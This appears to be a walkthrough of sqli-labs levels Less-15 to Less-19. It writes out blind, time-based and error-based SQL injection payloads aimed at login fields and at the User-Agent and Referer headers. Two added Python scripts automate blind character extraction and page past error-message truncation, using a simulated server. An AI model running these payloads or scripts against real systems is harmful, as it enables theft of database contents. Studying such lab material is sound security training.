Contents
Less-15
Type anything in...
Capture the request
admin' and 1=1;#
admin' and 1=2;#
Blind injection
Using time-based injection
Guess the length of the database name
uname=admin'and if(length(database())=8,sleep(10),1) --+&passwd=password&submit=Submit
Guess the first letter of the database name
and if(left(database(),1)='s',sleep(10),1)
...and so on... a 10-second delay per guess is painfully slow...
Guess the table names
uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 1,1),1)='r' ,sleep(6),1)
uname=admin'and if( left((select table_name from information_schema.tables where table_schema=database() limit 3,1),1)='u' ,sleep(6),1)--+&passwd=password&submit=Submit
...found the users table...
Let's use the other method instead (boolean-based, no sleep; the success/failure response is the oracle)...
uname=admin' and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23
Guess the column names
uname=admin' and if(left((select column_name from information_schema.columns where table_name='users' limit 4,1),8)='password' ,sleep(6),1) --+
uname=admin' and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23
Dump the data (ascii 68 is 'D')
uname=admin' and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23
Less-16
Capture the request
Error; try changing the quote to " instead
Still an error
Add something more (a closing parenthesis, giving ")) and it works!
But there is no echoed output, so blind injection is the only option...
Boolean-based blind or time-based blind; pick one and try
Guess the length of the database name
uname=admin") and (length(database())) = 8 %23 &passwd=password&submit=Submit
Guess the database name (ascii 115 is 's', 101 is 'e')
uname=admin") and (ascii(substr((select database()) ,1,1))) = 115 %23 &passwd=password&submit=Submit
uname=admin") and (ascii(substr((select database()) ,2,1))) = 101 %23 &passwd=password&submit=Submit
...continue position by position... the database name is security
Guess the table name length
uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 0,1))) = 6 %23 &passwd=password&submit=Submit
uname=admin") and (length((select table_name from information_schema.tables where table_schema=database() limit 3,1))) = 5 %23 &passwd=password&submit=Submit
...length 5... could it be the users table? Let's check
Guess the table name (ascii 117 is 'u')
uname=admin") and (ascii(substr((select table_name from information_schema.tables where table_schema=database() limit 3,1) ,1,1))) = 117 %23 &passwd=password&submit=Submit
Or use left()
uname=admin") and left((select table_name from information_schema.tables where table_schema=database() limit 3,1),5)="users" %23 &passwd=password&submit=Submit
Found the users table...
Guess the column name length
uname=admin") and (length((select column_name from information_schema.columns where table_name="users" limit 4,1))) = 8 %23 &passwd=password&submit=Submit
Guess the column name
uname=admin") and left((select column_name from information_schema.columns where table_schema=database() and table_name="users" limit 1,1),8)="username" %23 &passwd=password&submit=Submit
Dump the data
uname=admin") and (ascii(substr((select username from users limit 0,1),1,1))) = 68 %23 &passwd=password&submit=Submit
...one character at a time...
Less-17
Capture the request
Step one: find the closing character
Injecting in uname doesn't work no matter what...
So:
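Guessing each character with `= 115`, `= 101`, ... as in Less-15 and Less-16 costs up to a hundred-odd requests per character. The script below is an added example (not part of the original write-up) that automates the same boolean-blind extraction with the page's `ascii(substr(...))` payload, but compares with `>` and binary-searches the character, so every character costs exactly 7 requests. The lab server is replaced by a constructed fake oracle that evaluates the injected comparison against a hand-built stand-in for the `security` database; against the real lab you would replace `make_fake_oracle` with a function that sends the request and checks for the login-success page (or, for the time-based variant, a response time above the sleep value).

```python
import re
from typing import Callable, Dict, Tuple

# Constructed stand-in for the lab's `security` database (assumption, not
# queried from anywhere): the fake oracle answers questions about these values.
FAKE_DB: Dict[str, str] = {
    "select database()": "security",
    "select table_name from information_schema.tables where table_schema=database() limit 3,1": "users",
    "select username from users limit 0,1": "Dumb",
}


def build_payload(subquery: str, pos: int, threshold: int,
                  prefix: str = 'admin")', comment: str = "%23") -> str:
    """Less-16 style boolean payload, but with '>' instead of '=' so that a
    single request halves the candidate range for the character."""
    return (f"uname={prefix} and (ascii(substr(({subquery}),{pos},1))) > {threshold} "
            f"{comment}&passwd=password&submit=Submit")


def extract_string(oracle: Callable[[str], bool], subquery: str,
                   max_len: int = 64) -> Tuple[str, int]:
    """Recover the result of `subquery` one character at a time.

    `oracle(payload)` returns True when the injected condition was true
    (login succeeded). Returns (recovered_string, number_of_requests)."""
    recovered, requests = "", 0
    for pos in range(1, max_len + 1):
        lo, hi = 0, 127                      # smallest c with ascii(char) <= c
        while lo < hi:                       # 7 iterations for a range of 128
            mid = (lo + hi) // 2
            requests += 1
            if oracle(build_payload(subquery, pos, mid)):   # ascii(char) > mid
                lo = mid + 1
            else:
                hi = mid
        if lo == 0:   # substr() past the end is '' and MySQL's ascii('') is 0
            break
        recovered += chr(lo)
    return recovered, requests


def make_fake_oracle(db: Dict[str, str]) -> Callable[[str], bool]:
    """Simulate the vulnerable login page: parse the injected comparison out
    of the payload and evaluate it against `db`. A real oracle would send
    the request and inspect the response instead."""
    pattern = re.compile(r"ascii\(substr\(\((.+?)\),(\d+),1\)\)\) > (\d+)")

    def oracle(payload: str) -> bool:
        m = pattern.search(payload)
        if m is None:
            return False
        value = db.get(m.group(1), "")
        pos, threshold = int(m.group(2)), int(m.group(3))
        code = ord(value[pos - 1]) if pos <= len(value) else 0
        return code > threshold

    return oracle


if __name__ == "__main__":
    oracle = make_fake_oracle(FAKE_DB)
    for query in FAKE_DB:
        print(query, "->", extract_string(oracle, query))
```

Recovering `security` takes 9 positions (8 characters plus the terminating empty substr) at 7 requests each, 63 requests in total, instead of up to 127 requests per character with equality tests. The same loop drives the time-based variant from Less-15 unchanged: only the oracle function decides truth from the response time rather than the page content.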
uname=admin&passwd=password' and 1=1;#&submit=Submit
Success; the injection point has moved to passwd...
Use updatexml(XML_document, XPath_string, new_value);
Tip: the XPath_string argument is what triggers the error. concat() glues the pieces into one string that is not valid XPath, so MySQL raises an XPATH syntax error and the error message echoes the offending string, leaking the query result.
0x7e is '~', which is not valid XPath syntax either; it guarantees the error and marks where the leaked value starts and ends.
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select user()),0x7e),1) %23&submit=Submit
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select database()),0x7e),1) %23&submit=Submit
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select group_concat(column_name) from information_schema.columns where table_name='users'),0x7e),1) %23&submit=Submit
The result is incomplete... what now? (The XPATH syntax error message shows only the first 32 characters of the string, so a long group_concat() result is cut off.)
Dump them one at a time then
Dump the database names
uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 0,1),0x7e),1) %23 &submit=Submit
uname=admin&passwd=password'and updatexml(1,concat(0x7e,(select schema_name from information_schema.schemata limit 5,1),0x7e),1) %23 &submit=Submit
Dump the table names in the security database
uname=admin&passwd=password' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema="security" limit 3,1),0x7e),1) %23 &submit=Submit
Note: without the where clause you get the table names from all schemas
Dump the column names
Dump the data
...and so on...
Less-18
The page looks different this time
Capture the request
No closing character works in either uname or passwd
Look at the source code
There is an insert statement that writes uagent, ip_address and username into the database
After a successful login the IP and User-Agent are printed back
So let's try
Switch the injection point (to the User-Agent header)
Dump the database name
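Rather than falling back to `limit N,1` for every row, the 32-character limit of the updatexml error message can be handled by wrapping the subquery in `substr()` and paging through it 31 characters at a time (the leading `~` uses up one of the 32 visible characters). The script below is an added example, not part of the original write-up: it builds the page's passwd payload with a sliding window, pulls the leaked text out of the `XPATH syntax error: '~...'` message and reassembles the full value. The lab server is replaced by a constructed fake that truncates the way MySQL does; against the real lab, `make_fake_error_oracle` would be replaced by a function that posts the form and returns the error text from the response.

```python
import re
from typing import Callable, Dict

ERROR_LIMIT = 32            # MySQL echoes at most 32 characters of the bad XPath string
WINDOW = ERROR_LIMIT - 1    # the leading '~' takes one of them

# Constructed stand-in for a result too long for a single error message
# (assumption: this column list is made up for the example).
FAKE_DB: Dict[str, str] = {
    "select group_concat(column_name) from information_schema.columns where table_name='users'":
        "id,username,password,email_id,referer,ip_address,uagent",
}


def build_payload(subquery: str, offset: int, width: int = WINDOW) -> str:
    """Less-17 style error-based payload with the subquery cut to one window."""
    window = f"substr(({subquery}),{offset},{width})"
    return (f"uname=admin&passwd=password' and updatexml(1,concat(0x7e,({window}),0x7e),1) "
            f"%23&submit=Submit")


def leaked_part(error_text: str) -> str:
    """Extract the leaked window from "XPATH syntax error: '~...'".

    The trailing '~' only survives when the window was shorter than 31
    characters, so one trailing '~' is stripped (assumes the value itself
    does not end in '~')."""
    m = re.search(r"XPATH syntax error: '~([^']*)'", error_text)
    if m is None:
        return ""
    part = m.group(1)
    return part[:-1] if part.endswith("~") else part


def dump_long_value(oracle: Callable[[str], str], subquery: str,
                    width: int = WINDOW) -> str:
    """Page through the value `width` characters at a time until a window
    comes back short, which means the end of the value was reached."""
    result, offset = "", 1
    while True:
        chunk = leaked_part(oracle(build_payload(subquery, offset, width)))
        result += chunk
        if len(chunk) < width:
            return result
        offset += width


def make_fake_error_oracle(db: Dict[str, str]) -> Callable[[str], str]:
    """Simulate the vulnerable page: evaluate substr() against `db` and
    return the XPATH error truncated to 32 characters as MySQL would."""
    pattern = re.compile(r"substr\(\((.+?)\),(\d+),(\d+)\)")

    def oracle(payload: str) -> str:
        m = pattern.search(payload)
        if m is None:
            return "no error"
        value = db.get(m.group(1), "")
        offset, width = int(m.group(2)), int(m.group(3))
        xpath = "~" + value[offset - 1: offset - 1 + width] + "~"
        return f"XPATH syntax error: '{xpath[:ERROR_LIMIT]}'"

    return oracle


if __name__ == "__main__":
    oracle = make_fake_error_oracle(FAKE_DB)
    for query in FAKE_DB:
        print("untruncated payload leaks:", leaked_part(oracle(build_payload(query, 1, 10000))))
        print("paged result:            ", dump_long_value(oracle, query))
```

The first print shows what the page's original payload gives you: only the first 31 characters. The paged version needs one request per 31 characters of output, which for a `group_concat()` of column names is far fewer requests than one `limit N,1` query per row.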
'and updatexml(1,concat(0x7e,(select database()),0x7e),1) and '
extractvalue() works as well
'and extractvalue(1,concat(0x7e,(select database()),0x7e)) and '
Dump the table names
Dump the column names
Dump the data
........
Actually, you can also just log in successfully first
and look at the echoed output,
which suggests the injection point is in User-Agent
Less-19
This time I'm going to log in directly and take a look
There is echoed output
so this time the injection point is probably in Referer
Yep, that's right~
Look at the source code